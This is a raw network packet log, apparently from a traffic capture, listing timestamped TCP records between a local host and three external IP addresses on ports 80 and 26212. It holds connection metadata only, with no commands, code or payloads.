Sep 3, 2024 17:13:05.575097084 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575110912 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575153112 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575158119 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575158119 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575169086 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575180054 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575191975 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575211048 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575232029 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575565100 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575577021 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575588942 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575608969 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575639009 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575771093 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575782061 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575792074 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575802088 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575813055 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575825930 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575829983 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575841904 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575853109 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.575853109 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575860977 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575891018 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575911999 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576239109 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576251030 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576261997 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576277018 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576287985 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576294899 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576299906 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576323032 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576345921 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576704025 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576720953 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576733112 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576742887 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576750994 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576754093 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576766014 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576766968 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576776028 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576787949 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576798916 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576802015 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576809883 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576821089 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576824903 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576833010 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.576843977 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.576884985 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577279091 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577291965 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577337027 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577431917 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577446938 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577456951 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577469110 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577480078 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577485085 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577491045 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577507019 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577507973 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577521086 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577526093 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577533007 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577542067 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577550888 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577553034 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577564955 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577578068 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577583075 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577589989 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577609062 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577614069 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577632904 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577656984 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.577956915 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577970982 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.577982903 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.578008890 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.578032017 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580235004 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580255032 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580266953 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580285072 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580300093 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580395937 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580410957 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580420971 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580431938 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580450058 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580466032 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580512047 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580524921 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580533981 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580559969 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580579042 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580609083 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580653906 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580667973 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580682039 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580693960 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580705881 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580718040 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580724955 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580756903 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580905914 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580920935 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580931902 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580944061 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580955982 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.580955982 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.580985069 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.581011057 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.620460987 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.620524883 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.620731115 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683144093 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683171034 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683182955 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683213949 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683245897 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683312893 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683324099 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683334112 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683346033 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683357954 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683362007 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683381081 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683398962 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683490992 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683502913 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683537006 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683547974 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683602095 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683620930 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683653116 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683662891 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683765888 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683777094 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683788061 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683799982 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683811903 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683821917 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683825016 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.683849096 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.683860064 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684031963 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684045076 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684056044 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684067011 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684077978 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684087992 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684113026 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684124947 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684300900 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684312105 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684323072 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684340000 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684351921 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684351921 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684364080 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684376955 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684384108 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684386015 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684396982 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684415102 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684442043 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684623003 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684633970 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684644938 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684655905 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684672117 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684674025 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684681892 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684691906 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684704065 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684715033 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684725046 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684726000 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684731960 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684739113 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.684756041 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.684793949 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685081005 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685129881 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685281992 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685292959 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685302019 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685314894 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685326099 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685336113 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685342073 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685343981 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685352087 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685363054 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685372114 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685373068 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685385942 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685394049 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685396910 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685408115 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685410976 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685419083 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685429096 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685436010 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685441017 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685452938 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.685477972 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.685502052 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686085939 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686098099 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686109066 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686120987 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686139107 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686141014 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686152935 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686162949 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686166048 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686168909 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686176062 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686180115 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686186075 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686187983 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686311007 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686532974 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686546087 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686558008 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686604977 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686604977 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686644077 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686655998 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686666012 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686677933 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686690092 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686693907 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686707973 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686718941 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686724901 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686729908 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686738014 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686741114 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686753035 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.686774015 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.686800957 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687359095 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687371016 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687381029 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687391996 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687402964 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687413931 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687413931 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687431097 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687442064 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687443018 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687452078 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687460899 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687463999 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687477112 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687484026 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687488079 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687499046 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687509060 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687513113 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687525034 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687525034 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687535048 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687537909 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687545061 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687556028 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687567949 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687576056 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687580109 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.687597990 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.687616110 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.688055038 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.688066959 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.688077927 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.688092947 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.688105106 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.688117027 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.688132048 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.688150883 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:06.343827963 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:06.344631910 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:06.349078894 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:06.349133968 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:06.349457026 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:06.349518061 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:06.350121975 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:06.354899883 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.196070910 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.196166992 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.543575048 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.552068949 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.729010105 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:07.733989954 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:07.734266996 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:07.742928982 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:07.747806072 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:07.835510015 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835525990 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835536003 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835580111 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.835608959 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835617065 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.835623980 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835649014 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.835664988 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.835731983 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835741997 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835771084 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.835803986 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835819006 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835832119 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.835858107 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.835875034 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.836152077 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.839036942 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.842629910 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.842642069 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.842655897 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.842679977 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.842720985 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.936980963 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.937114954 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:07.937273026 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:07.937325001 CEST	49713	80	192.168.2.8	185.215.113.16
